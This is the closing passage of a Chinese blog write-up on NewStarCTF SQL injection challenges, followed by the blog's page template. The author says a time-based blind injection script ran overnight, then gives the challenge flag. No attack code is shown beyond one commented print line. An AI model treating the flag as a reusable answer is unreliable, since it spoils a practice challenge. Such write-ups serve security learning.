class="line"><span class="comment">#print(&quot;Final Results:&quot;,res[::-1]) #如果选择倒序，选这个</span></span><br></pre></td></tr></table></figure>
<p>然后就等吧… 啊呜，好困呜呜</p>
<p>睡一觉就把表跑完了，放心吧</p>
<p>记得renew 靶机</p>
<img src="/posts/40736/25.png" class title="一包烟，一杯酒，时间盲注跑一天">
<p>睡了一觉，终于跑完了（我忘记开最后那个倒序重整了，所以flag是倒着的）</p>
<img src="/posts/40736/26.png" class title="一包烟，一杯酒，时间盲注跑一天">
<p>flag{Ju2t_let_me_sleep_f0r_a_while}</p>
<hr>
<p>结束辣，好题，但是结束了才会做呜呜呜</p>
<p>看我摆烂的结果如何？</p>
<p>题目来自：<a target="_blank" rel="noopener" href="http://buuoj.cn">buuoj.cn</a>  //NewStarsCTF</p>
<p>图片来自：截图</p>
<p>侵删qwq</p>
</div>
        </div>
        
            <div class="kratos-copyright text-center clearfix">
                <h5 itemprop="copyrightNotice">本作品采用 <a rel="license nofollow" target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/">知识共享署名-相同方式共享 4.0 国际许可协议</a> 进行许可</h5>
            </div>
        
        <footer class="kratos-entry-footer clearfix">
            
                <div class="post-like-donate text-center clearfix" id="post-like-donate">
                
                    <a class="donate" href="javascript:;"><i class="fa fa-bitcoin"></i> 打赏</a>
                
                
                    <a class="share" href="javascript:;"><i class="fa fa-share-alt"></i> 分享</a>
                    <div class="share-wrap" style="display: none;">
    <div class="share-group">
        <a href="javascript:;" class="share-plain qq" onclick="share('qq');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-qq"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain qzone" onclick="share('qzone');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-star"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weixin pop style-plain" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weixin"></i>
            </div>
            <div class="share-int">
                <div class="qrcode" id="wechat-qr"></div>
                <p>打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮</p>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weibo" onclick="share('weibo');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weibo"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain facebook style-plain" onclick="share('facebook');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-facebook"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain twitter style-plain" onclick="share('twitter');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-twitter"></i>
            </div>
        </a>
    </div>
    <script type="text/javascript">
        $(()=>{
            new QRCode("wechat-qr", {
                text: "http://example.com/posts/40736.html",
                width: 150,
                height: 150,
                correctLevel : QRCode.CorrectLevel.H
            });
        });
        function share(dest) {
            const qqBase        = "https://connect.qq.com/widget/shareqq/index.html?";
            const weiboBase     = "https://service.weibo.com/share/share.php?";
            const qzoneBase     = "https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?";
            const facebookBase  = "https://www.facebook.com/sharer/sharer.php?";
            const twitterBase   = "https://twitter.com/intent/tweet?";
            const hostUrl       = "http://example.com/posts/40736.html";
            const title         = "「NewStarCTF SQL注入题」";
            const excerpt       = `摆烂大师的第一篇Web文章，qwq。检验我摆烂的水平的时间到了
写写NewStarCTF的SQL注入题吧… 五周考了五个注入，考的点都不一样`;
            let _URL;
            switch (dest) {
                case "qq"       : _URL = qqBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";     break;
                case "weibo"    : _URL = weiboBase+"url="+hostUrl+"&title="+title+excerpt;                                 break;
                case "qzone"    : _URL = qzoneBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";  break;
                case "facebook" : _URL = facebookBase+"u="+hostUrl;                                                        break;
                case "twitter"  : _URL = twitterBase+"text="+title+excerpt+"&url="+hostUrl;                                break;
            }
            window.open(_URL);
        };
    </script>
</div>
                
                </div>
            
            <div class="footer-tag clearfix">
                <div class="pull-left">
                <i class="fa fa-tags"></i>
                    <a class="tag-none-link" href="/tags/POST/" rel="tag">POST</a>, <a class="tag-none-link" href="/tags/SQL-Injection/" rel="tag">SQL_Injection</a>
                </div>
                <div class="pull-date">
                    <time datetime="2023-03-12T09:43:56.842Z" itemprop="dateModified">最后编辑：2023-03-12</time>
                </div>
            </div>
        </footer>
    </div>
    
        <nav class="navigation post-navigation clearfix" role="navigation">
            
            <div class="nav-previous clearfix">
                <a title=" About Me" href="/posts/61421.html">&lt; 上一篇</a>
            </div>
            
            
            <div class="nav-next clearfix">
                <a title=" Buuoj Hack World 题解" href="/posts/60450.html">下一篇 &gt;</a>
            </div>
            
        </nav>
    
    
        <div id="v-comments" class="post-comments bg-image"></div>
<script>
    var load_comm = () => {
        const init = () => {
            new Valine({
                el: '#v-comments',
                appId: 'bNjjbBH5XN8401rWT4xZhbCF-gzGzoHsz',
                appKey: 'R4c5rtiMieN1Kb3frShXDfw8',
                visitor: true,
                enableQQ: false,
                path: '/posts/40736.html'
                
            });
        }
        if (typeof Valine === 'undefined') {
            const src = '/vendors/valine@1.4.18/dist/Valine.min.js';
            $.getScript(src, init);
        } else {
            init();
        }
    };
</script>


<script>
<style>
    .v .veditor{min-height: 10rem;
        background-image: url(https://cdn.jsdelivr.net/gh/cungudafa/img/images/girls2.png);
        background-size: contain;
        background-repeat: no-repeat;
        background-position: right;
        background-color: rgba(255,255,255,0);
        resize: none;}
</style>
</script>


    <script>
        new Valine({
            el: '#vcomments',
            lang: 'zh-cn',
            admin_email: '83635877@qq.com',//博主邮箱
            appId: "",
            appKey: "",
            path: window.location.pathname,
            comment_count: true,
            //notify: false, // 邮件提醒!使用第三方就不要添加这个!!
            //verify: true, //验证码
            avatar: 'monsterid',//小怪物头像
            placeholder: "qwq~"
        });
        
</script>
    <script src="https://sdk.jinrishici.com/v2/browser/jinrishici.js" charset="utf-8"></script>
    <script type="text/javascript">
        jinrishici.load(function(result) {
            var jrsc_plac =  result.data.content + "\n「" + result.data.origin.title + "」" + result.data.origin.dynasty + " · " + result.data.origin.author;
            document.getElementById("veditor").setAttribute("placeholder",jrsc_plac);
        })
    </script>

<noscript>Please enable JavaScript to view the <a target="_blank" rel="noopener" href="https://valine.js.org/">comments powered by Valine.</a></noscript>

    
</article>

        

            </section>

        

        <script src="./js/src/Valine.min.js"></script>   
        
        
            

<section id="kratos-widget-area" class="col-md-4 hidden-xs hidden-sm">
    <!-- 文章和页面根据splitter来分割，没有的话就从头开始设置为sticky -->
    
    
                <aside id="krw-about" class="widget widget-kratos-about clearfix">
    <div class="photo-background"></div>
    <div class="photo-wrapper clearfix">
        <div class="photo-wrapper-tip text-center">
            <img class="about-photo" src="/images/touxiang.jpg" loading="lazy" decoding="auto" />
        </div>
    </div>
    <div class="textwidget">
        <p class="text-center"></p>
    </div>
    <div class="site-meta">
        <a class="meta-item" href="/archives/">
            <span class="title">
                文章
            </span>
            <span class="count">
                59
            </span>
        </a>
        <a class="meta-item" href="/categories/">
            <span class="title">
                分类
            </span>
            <span class="count">
                11
            </span>
        </a>
        <a class="meta-item" href="/tags/">
            <span class="title">
                标签
            </span>
            <span class="count">
                13
            </span>
        </a>
    </div>
</aside>
            
                    <div class="sticky-area">
                
                
  <aside id="krw-categories" class="widget widget-kratos-categories clearfix">
    <h4 class="widget-title"><i class="fa fa-folder"></i>分类目录</h4>
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a><span class="category-list-count">11</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/java/">java</a><span class="category-list-count">1</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/CTF-Misc/">CTF Misc</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/CTF-Web/">CTF Web</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/CTF-Web-WriteUp/">CTF Web WriteUp</a><span class="category-list-count">9</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/CTF-WriteUp/">CTF WriteUp</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Intro/">Intro</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Java/">Java</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/java/">java</a><span class="category-list-count">6</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%B8%8D%E5%8A%A1%E6%AD%A3%E4%B8%9A%E7%B3%BB%E5%88%97/">不务正业系列</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E/">基础漏洞</a><span class="category-list-count">15</span></li></ul>
  </aside>


            
                
  <aside id="krw-tags" class="widget widget-kratos-tags clearfix">
    <h4 class="widget-title"><i class="fa fa-tags"></i>标签聚合</h4>
      <div class="tag-clouds">
        <a href="/tags/Introduce-Myself/" style="font-size: 0.6em;">Introduce_Myself</a> <a href="/tags/Java/" style="font-size: 0.6em;">Java</a> <a href="/tags/Misc/" style="font-size: 0.6em;">Misc</a> <a href="/tags/POST/" style="font-size: 0.67em;">POST</a> <a href="/tags/RCE/" style="font-size: 0.67em;">RCE</a> <a href="/tags/SQL-Injection/" style="font-size: 0.7em;">SQL_Injection</a> <a href="/tags/Upload/" style="font-size: 0.6em;">Upload</a> <a href="/tags/Web/" style="font-size: 0.8em;">Web</a> <a href="/tags/awd/" style="font-size: 0.6em;">awd</a> <a href="/tags/java/" style="font-size: 0.73em;">java</a> <a href="/tags/%E4%B8%8D%E5%8A%A1%E6%AD%A3%E4%B8%9A/" style="font-size: 0.6em;">不务正业</a> <a href="/tags/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E/" style="font-size: 0.77em;">基础漏洞</a> <a href="/tags/%E6%B8%97%E9%80%8F/" style="font-size: 0.63em;">渗透</a>
      </div>
  </aside>

            
                
  <aside id="krw-posts" class="widget widget-kratos-posts">
  <h4 class="widget-title"><i class="fa fa-file"></i>最新文章</h4>
  <div class="tab-content">
      <ul class="list-group">
        
        
          
          
            <a class="list-group-item" href="/posts/26055.html"><i class="fa  fa-book"></i> CISCN2024 Web方向题解</a>
            
          
        
          
          
            <a class="list-group-item" href="/posts/48037.html"><i class="fa  fa-book"></i> 山警网络空间安全实验室比赛的复现学习</a>
            
          
        
          
          
            <a class="list-group-item" href="/posts/23430.html"><i class="fa  fa-book"></i> javaweb与tomcat</a>
            
          
        
          
          
            <a class="list-group-item" href="/posts/25574.html"><i class="fa  fa-book"></i> java内存马学习 - 介绍</a>
            
          
        
          
          
            <a class="list-group-item" href="/posts/4656.html"><i class="fa  fa-book"></i> Flask内存马学习</a>
            
          
        
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
      </ul>
  </div>
  </aside>

            
    </div>
</section>

        
        </div>
    </div>
</div>
<footer>
    <div id="footer"  class="ap-lrc"  >
        <div class="container">
            <div class="row">
                <div class="col-md-6 col-md-offset-3 footer-list text-center">
                    <ul class="kratos-social-icons">
                        <li><a target="_blank" rel="nofollow" href="https://weibo.com/u/HyDr0genSpectRuM"><i class="fa fa-weibo"></i></a></li>
                        
                        
                        <li><a target="_blank" rel="nofollow" href="https://twitter.com/Err0r2333"><i class="fa fa-twitter"></i></a></li>
                        
                        
                        
                        <li><a target="_blank" rel="nofollow" href="https://github.com/Err0r233"><i class="fa fa-github"></i></a></li>
                        
                    </ul>
                    <ul class="kratos-copyright">
                        <div>
                            <li>&copy; 2024 Err0r233 版权所有.</li>
                            <li>本站已运行<span id="span_dt">Loading...</span></li>
                        </div>
                        <div>
                            <li>Theme <a href="https://github.com/Candinya/Kratos-Rebirth" target="_blank">Kratos:Rebirth</a></li>
                            <li>Site built with&nbsp;<i class="fa fa-heart throb" style="color:#d43f57"></i>&nbsp;by Err0r2333.</li>
                        </div>
                        <div>
                            <li>Powered by <a href="https://hexo.io" target="_blank" rel="nofollow">Hexo</a></li>
                            <li>Hosted on <a href="https://github.io" target="_blank">Github Pages</a></li>
                        </div>
                        <div>
                            
                            
                        </div>
                        <div id="binft"></div>
  <script>
    var binft = function (r) {
      function t() {
        return b[Math.floor(Math.random() * b.length)]
      }  
      function e() {
        return String.fromCharCode(94 * Math.random() + 33)
      }
      function n(r) {
        for (var n = document.createDocumentFragment(), i = 0; r > i; i++) {
          var l = document.createElement("span");
          l.textContent = e(), l.style.color = t(), n.appendChild(l)
        }
        return n
      }
      function i() {
        var t = o[c.skillI];
        c.step ? c.step-- : (c.step = g, c.prefixP < l.length ? (c.prefixP >= 0 && (c.text += l[c.prefixP]), c.prefixP++) : "forward" === c.direction ? c.skillP < t.length ? (c.text += t[c.skillP], c.skillP++) : c.delay ? c.delay-- : (c.direction = "backward", c.delay = a) : c.skillP > 0 ? (c.text = c.text.slice(0, -1), c.skillP--) : (c.skillI = (c.skillI + 1) % o.length, c.direction = "forward")), r.textContent = c.text, r.appendChild(n(c.prefixP < l.length ? Math.min(s, s + c.prefixP) : Math.min(s, t.length - c.skillP))), setTimeout(i, d)
      }
      var l = "",
      o = ["青青陵上柏，磊磊涧中石。", "人生天地间，忽如远行客。","斗酒相娱乐，聊厚不为薄。", "驱车策驽马，游戏宛与洛。","洛中何郁郁，冠带自相索。","长衢罗夹巷，王侯多第宅。","两宫遥相望，双阙百余尺。","极宴娱心意，戚戚何所迫？"].map(function (r) {
      return r + ""
      }),
      a = 2,
      g = 1,
      s = 5,
      d = 75,
      b = ["rgb(110,64,170)", "rgb(150,61,179)", "rgb(191,60,175)", "rgb(228,65,157)", "rgb(254,75,131)", "rgb(255,94,99)", "rgb(255,120,71)", "rgb(251,150,51)", "rgb(226,183,47)", "rgb(198,214,60)", "rgb(175,240,91)", "rgb(127,246,88)", "rgb(82,246,103)", "rgb(48,239,130)", "rgb(29,223,163)", "rgb(26,199,194)", "rgb(35,171,216)", "rgb(54,140,225)", "rgb(76,110,219)", "rgb(96,84,200)"],
      c = {
        text: "",
        prefixP: -s,
        skillI: 0,
        skillP: 0,
        direction: "forward",
        delay: a,
        step: g
      };
      i()
      };
      binft(document.getElementById('binft'));
  </script>
                    </ul>
                </div>
            </div>
        </div>
        <div class="kr-tool text-center">
            <div class="tool">
                
                    <div class="box search-box">
                        <a href="/search/">
                            <span class="fa fa-search"></span>
                        </a>
                    </div>
                
                
                    <div class="box theme-box" id="darkmode-switch">
                        <span class="fa fa-adjust"></span>
                    </div>
                
                
            </div>
            <div class="box gotop-box">
                <span class="fa fa-chevron-up"></span>
            </div>
        </div>
    </div>
</footer>
</div>
</div>


        <script defer src="/vendors/bootstrap@3.3.4/dist/js/bootstrap.min.js"></script>
<script defer src="/vendors/nprogress@0.2.0/nprogress.js"></script>
<script>
    if (!window.kr) {
        window.kr = {};
    }
    window.kr.notMobile = (!(navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)));
    window.kr.siteRoot = "/";
</script>

    <div>
        <canvas id="snow"></canvas>
        <script async src="/js/snow.min.js"></script>
    </div>


    <script async src="/js/candy.min.js"></script>



    <script defer src="/vendors/aplayer@1.10.1/dist/APlayer.min.js"></script>
    
    <script defer src="/vendors/meting@2.0.1/dist/Meting.min.js"></script>
    <meting-js
        server="netease"
        type="playlist"
        id="7733928587"
        order="random"
        fixed="true"
    >
    </meting-js>



    <script defer src="/vendors/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>

<script defer src="/vendors/clipboard@2.0.6/dist/clipboard.min.js"></script>
<script defer src="/js/kratosr.min.js"></script>
<script defer src="/js/pjax.min.js"></script>

    <script defer src="/vendors/layui-src@2.5.5/dist/layui.all.js"></script>



<!-- Extra support for third-party plguins  -->



    </body>
</html>